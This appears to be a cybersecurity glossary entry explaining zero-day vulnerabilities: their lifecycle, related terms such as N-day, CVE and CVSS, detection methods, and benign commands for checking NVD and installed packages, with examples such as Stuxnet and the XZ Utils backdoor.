cybersecurity vulnerabilities

Zero-Day Vulnerability

zero-day vulnerabilities exploits patching
Plain English

A zero-day is a security flaw that nobody knows about except the attacker who discovered it. The software vendor has had “zero days” to fix it because they do not know it exists yet. This makes zero-days extremely dangerous: there is no patch, no update, and no specific defense against them until someone detects the attack, reports the flaw, and the vendor releases a fix.

Technical Definition

A zero-day vulnerability is a software security flaw that is unknown to the software vendor and for which no patch or mitigation exists at the time of discovery or exploitation. The term “zero-day” refers to the number of days the vendor has had to address the vulnerability (zero).

Lifecycle:

  1. Discovery: researcher or attacker finds the vulnerability
  2. Exploitation (0-day): if discovered by an attacker, it may be weaponized into an exploit before the vendor is aware
  3. Disclosure: vendor is notified (responsible disclosure) or the exploit is detected in the wild
  4. Patch development: vendor creates and tests a fix
  5. Patch release: vendor distributes the update
  6. Patch adoption: users/organizations apply the patch (the “patch gap” period remains dangerous)

Zero-day vs. related terms:

  • Zero-day vulnerability: the flaw itself
  • Zero-day exploit: working code that takes advantage of the flaw
  • Zero-day attack: an attack using the exploit in the wild before a patch is available
  • N-day: a vulnerability with a patch available but not yet applied (often more prevalent than true zero-days)

CVE (Common Vulnerabilities and Exposures) identifiers are assigned once a vulnerability is publicly disclosed, enabling tracking (e.g., CVE-2024-3094 for the XZ Utils backdoor).

CVSS (Common Vulnerability Scoring System) rates severity on a 0-10 scale: Critical (9.0-10.0), High (7.0-8.9), Medium (4.0-6.9), Low (0.1-3.9).

Detection without signatures:

  • Behavioral analysis (EDR/XDR detecting anomalous process behavior)
  • Network traffic anomaly detection
  • Sandboxing and detonation (executing suspicious files in isolated environments)
  • Threat hunting (proactive searching for indicators of compromise)

Tracking zero-days with CVE data 

# Search NVD (National Vulnerability Database) for recent critical CVEs
$ curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?\
cvssV3Severity=CRITICAL&resultsPerPage=5" | \
  jq '.vulnerabilities[].cve | {id, description: .descriptions[0].value}'

# Check if a specific CVE affects your systems
$ grep -r "libxz" /var/log/dpkg.log  # Debian/Ubuntu
$ rpm -qa | grep xz                   # RHEL/Fedora

# Subscribe to vendor security advisories
# Ubuntu: https://ubuntu.com/security/notices
# NIST NVD: https://nvd.nist.gov/
# CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
In the Wild

Zero-days command premium prices on the vulnerability market. Legitimate bug bounty programs pay $10,000 to $500,000+ for critical zero-days, while black market brokers pay significantly more for weaponized exploits targeting iOS, Chrome, or Windows. Nation-state actors stockpile zero-days for intelligence operations (Stuxnet used four Windows zero-days). The XZ Utils backdoor (CVE-2024-3094) demonstrated supply chain zero-days, where a malicious contributor inserted a backdoor into a widely used compression library over two years of trust-building. Organizations defend against zero-days through defense-in-depth: network segmentation, least-privilege access, EDR with behavioral detection, and rapid patching of N-day vulnerabilities to reduce the overall attack surface.

← Back to Dictionary